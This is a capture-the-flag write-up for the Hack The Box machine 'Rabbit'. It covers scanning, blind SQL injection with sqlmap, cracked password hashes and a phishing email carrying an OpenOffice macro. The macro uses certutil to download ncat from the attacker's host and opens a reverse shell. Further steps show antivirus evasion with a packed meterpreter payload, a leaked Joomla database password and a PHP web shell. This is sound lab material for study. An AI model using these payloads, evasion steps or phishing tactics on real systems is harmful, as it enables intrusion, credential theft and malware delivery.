Writeup: Hack The Box — Rabbit
Description
- Name:
Rabbit - IP:
10.10.10.71 - Author:
lkys37en - Difficulty:
6/10
Discovery
nmap -sV -sC -Pn -p- 10.10.10.71
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-06-27 18:44:58Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:57+00:00; +5h00m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m00s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5722/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6017/tcp open msrpc Microsoft Windows RPC
6142/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp open mc-nmf .NET Message Framing
44668/tcp open msrpc Microsoft Windows RPC
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50242/tcp open msrpc Microsoft Windows RPC
50246/tcp open msrpc Microsoft Windows RPC
50292/tcp open msrpc Microsoft Windows RPC
50299/tcp open msrpc Microsoft Windows RPC
50327/tcp open msrpc Microsoft Windows RPC
50343/tcp open msrpc Microsoft Windows RPC
50354/tcp open msrpc Microsoft Windows RPC
50363/tcp open msrpc Microsoft Windows RPC
50365/tcp open msrpc Microsoft Windows RPC
50374/tcp open msrpc Microsoft Windows RPC
50387/tcp open msrpc Microsoft Windows RPC
50395/tcp open msrpc Microsoft Windows RPC
50410/tcp open msrpc Microsoft Windows RPC
50422/tcp open msrpc Microsoft Windows RPC
64337/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1dirsearch on port 80:
403 - 58B - /rpc
301 - 0B - /owa -> /owa/
403 - 58B - /RPC
401 - 1KB - /powershell
403 - 0B - /ewsdirsearch on port 443:
200 - 689B - /
301 - 0B - /owa -> /owa/
301 - 157B - /aspnet_client -> https://10.10.10.71/aspnet_client/
302 - 126B - /ecp -> /ecp/
302 - 146B - /exchange -> https://10.10.10.71/owa
302 - 146B - /Exchange -> https://10.10.10.71/owa
302 - 146B - /exchweb -> https://10.10.10.71/owa
302 - 146B - /public -> https://10.10.10.71/owa
302 - 146B - /Public -> https://10.10.10.71/owa
302 - 146B - /PUBLIC -> https://10.10.10.71/owa
302 - 147B - /Exchange/ -> https://10.10.10.71/owa/
302 - 147B - /ExchWeb/ -> https://10.10.10.71/owa/
302 - 147B - /Public/ -> https://10.10.10.71/owa/
302 - 149B - /Exchange/md -> https://10.10.10.71/owa/md
401 - 0B - /ews
401 - 1KB - /Microsoft-Server-ActiveSync/
401 - 1KB - /powershell
401 - 58B - /rpc
401 - 58B - /RPC
403 - 2KB - /Trace.axd
500 - 3KB - /Exchange/admin.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
500 - 3KB - /Exchange/asp.aspx
500 - 3KB - /Exchange/aspxspy.aspxdirsearch on port 8080:
200 - 10KB - /
200 - 10KB - /index
200 - 10KB - /Index
200 - 10KB - /INDEX
200 - 10KB - /index.html
200 - 198KB - /favicon
200 - 198KB - /favicon.ico
200 - 6KB - /index.old
301 - 328B - /joomla -> http://10.10.10.71:8080/joomla/
301 - 328B - /Joomla -> http://10.10.10.71:8080/Joomla/
301 - 330B - /complain -> http://10.10.10.71:8080/complain/
301 - 342B - /joomla/administrator -> http://10.10.10.71:8080/joomla/administrator/
403 - 308B - /phpmyadminPwn
On the complain main page 10.10.10.71:8080/complain/:
Online Complaint Monitoring System (OCMS) is a system operated by the city of Pune, India. A Complaint Management System is one of latest productivity enhancement tools used widely by all organisations wherever there is a need of booking of complaints via operators and analysis of complaints which are made or are pending.
Searching for exploits for this framework we found a Blind SQLi abuse from an hardcoded admin login (admin:admin123); the default login is not working on the application. We need to register as Customer to get a valid session to perform the attack.
sqlmap -u "http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans" --cookie "PHPSESSID=shuv7rnuvj10rds4leqq4of5f6" --dbms mysql --random-agent -p id
We can access the mod=admin even if we registered as Customer.
Now it’s possible to dump all data from complain, joomla, secret databases.
From the secret dump we got a bunch of credentials:
Database: secret
Table: users
[10 entries]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dumah | 33da7a40473c1637f1a2e142f4925194 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 |
+----------+----------------------------------+Using hascat some hashes has been cracked:
Ariel:pussycatdolls
Dimitri:shaunamaloney
Malek:barcelona
Dumah:popcorn
Kain:doradaybendita
Raziel:kelseylovesbarry
Moebius:santiago
Magnus:xNnWo6272k7xand two missed:
Zephon:13fa8abd10eed98d89fd6fc678afaf94
Turel:d322dc36451587ea2994c84c9d9717a1Unfortunately those credentials do not works on Joomla installation so we tried to login in the Outlook Wep Applicatio (OWA):
- Ariel works on OWA and ECP
- Kain works on OWA and ECP
- Magnus works on OWA and ECP
- Raziel is listed as user but we cannot login with those credentials
- Dimitri has an email address but he cannot receive mails
From Ariel mailbox we saw that the Administrator changed some software configurations.
Now all computers will use Open Office per default but they also deployed Windows Defender and some PowerShell contraints.
In addition we know that the Administrator is waiting for a mail for some TPS reports.
Wrapping all up we can generate a malicious Open Office document that will spawn a reverse shell but we cannot use PowerShell and maybe we need to do some AV evasion for our payload/macro.
First of all we created the document for our macro to run OnLoad function when the user opens the odt file (Libreoffice Macro).
We could use the metasploit module exploit/multi/misc/openoffice_document_macro but it will create a dropper with PowerShell to spawn a meterpreter session so we prefferred to build the macro on our own.
We tried to generate out meterpreter shell with msfvenom.
and created the macro to download and execute the stage via SMB with Impacket: smbserver.py DODO .
Sub OnLoad
Shell("echo Pwned!")
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.XX.XX\DODO & call \\10.10.XX.XX\DODO\dodo.exe")
End SubUsing the created ELF locally (and the remotely) we failed miserably: Windows is detecting the malicious PE.
Windows detected the session and deleted the stager. We must focus to get a simple reverse shell.
After some tries we created a payload to ping the local machine and download something using certuitl (PayloadsAllTheThing) and not PowerShell.
Finally we created the ultimate payload:
Sub OnLoad
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f ""http://10.10.XX.XX/ncat.exe"" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.XX.XX 443 -e powershell.exe")- Spawns a
cmd.exeprocess. - Downloads a portable version of
netcatusgincertutilfrom the local machine (“python -m http.server 80”). - Saves the file in
C:\Users\Public(some other know paths did not worked). - Call the
ncat.exePE to connect to the listener on the local machine withpowershell.exeattached.
Now it’s time to send the malicious ODF file to someone:
When in doubt… ¯\_(ツ)_/¯ … u̶s̶e̶ ̶b̶r̶u̶t̶e̶ ̶f̶o̶r̶c̶e̶ send mails to everyone
From OWA we kindly sended the file to everyone suggesting them to enable the macro.
After a while (5–6 mins) we saw a download of the netcat file and a shell popped as Raziel user! Now we also know who is the right recipient!
Finally we were able to read the Rabbit user flag.
Now we need to upgrade out shell to a meterpreter session and privesc to Administrator but we can’t use PowerShell since the shell is in the ConstrainedLanguage mode (“$ExecutionContext.SessionState.LanguageMode”) and we can’t spawn a PowerShell version 2 to bypass the jail.
We tried to upload a EXE generate with msfvenom but the execution is blocked by the AV se we created a FUD PE with shelter:
ncat.exe(an EXE that we had in the folder) as base (use your own EXE in real world scenarios)- enable mode
Auto - enable mode
Stealth(when you use the Steal Mode feature you need to set the payload exit function to Thread on mestasploit handler) - set payload as
meterpreter_reverse_tcp - set LHOST
- set LPORT
- upload the generated file to the remote machine with
certutil -urlcache -split -f "http://10.10.XX.XX/dodo.exe" C:\Users\Public\dodo.exe - set up the metasploit listener
use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 3487; set AutoRunScript post/windows/manage/migrate; run -j;N.B: do not upload anything to online services to check if the PE is really undetectable!.
We now got a migrated meterpreter session!
But after some seconds the connection is killed target-side for some reasons (maybe the AV is detecting the connection or the malicious payload in memory). We have to use the constrained shell spawned with netcat.
net user Raziel
User name Raziel
Full Name Raziel
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/29/2017 10:04:44 AM
Password expires Never
Password changeable 10/30/2017 10:04:44 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/11/2018 12:00:39 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Discovery Management *Mailbox Import-Export
*Domain Users *Organization Manageme
The command completed successfully.From the Joomla installation we read the user and password for MySQL server but we weren’t able to find/exploit anything more than what we saw with sqlmap.
type C:\wamp64\www\joomla\configuration.php
public $host = 'localhost';
public $user = 'dbuser';
public $password = 'zLlYCLRmqFMaONwY';
public $db = 'joomla';
public $dbprefix = 'llhe4_';
public $live_site = '';
public $secret = 'QJMwxJmeJP18x25X';We first focues on searching some SYSTEM/NT services to hijack but from tasklist /V we found that only the Father of All Processes is owned by NT AUTHORITY\SYSTEM.
Since we are interested in the mysql service we headed to “C:\wamp64\www” where all web-server configurations are stored and started to search for some configurations with root password and we found a index.old.php file.
From this page we saw that the alias “wordpress.htb.local” exists but is not present in the Apache’s www directory. From the man page of Tasklist command we noticed that system processes return an empty string: so httpd.exe could be runned by the admin user since we didn’t saw an associated user for that process.
We created the “wordpress” folder in “C:\wamp64\www” and added the domain to the local /etc/hosts file.
So we wrote and uploaded into Rabbit machine a simple web-shell with curl:
<?php
system($_GET["cmd"]);
Now we can easily read the root flag with
http http://wordpress.htb.local:8080/index.php\?cmd\="type C:\Users\Administrator\Desktop\root.txt"
